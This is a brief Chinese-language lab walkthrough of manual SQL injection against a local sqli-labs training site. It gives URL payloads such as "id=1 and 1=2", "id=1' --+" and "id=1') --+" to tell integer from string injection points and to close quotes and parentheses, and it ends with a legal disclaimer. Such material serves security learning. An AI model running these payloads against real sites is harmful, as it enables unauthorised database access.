一、整数注入
1、访问http://192.168.139.129/sqli/Less-2/?id=1 and 1=1,返回正常
2、访问http://192.168.139.129/sqli/Less-2/?id=2-1,返回正常
3、访问http://192.168.139.129/sqli/Less-2/?id=1 and 1=2,返回不正常
说明该注入点是整数注入
二、字符串注入
1、访问http://192.168.139.129/sqli/Less-1/?id=1 and 1=1,返回正常
2、访问http://192.168.139.129/sqli/Less-1/?id=1 and 1=2,返回正常
说明该注入点是字符串注入
三、单引号闭合
1、输入单引号,返回错误,错误信息为('1'' LIMIT 0,1),1后面多了一个单引号,我们用(--+)屏蔽后面的单引号
http://192.168.139.129/sqli/Less-1/?id=1'
2、访问http://192.168.139.129/sqli/Less-1/?id=1' --+,返回正常
四、单引号+括号闭合
1、输入单引号,返回错误,错误信息为('1'') LIMIT 0,1),1后面多了一个单引号和一般括号,我们用('))把前面的括号闭合,然后再用(--+)屏蔽后面的单引号和括号
http://192.168.139.129/sqli/Less-3/?id=1'
2、访问http://192.168.139.129/sqli/Less-3/?id=1') --+,返回正常
五、其他字符串闭合
1、双引号
2、加多重括号等等。。。
禁止非法,后果自负
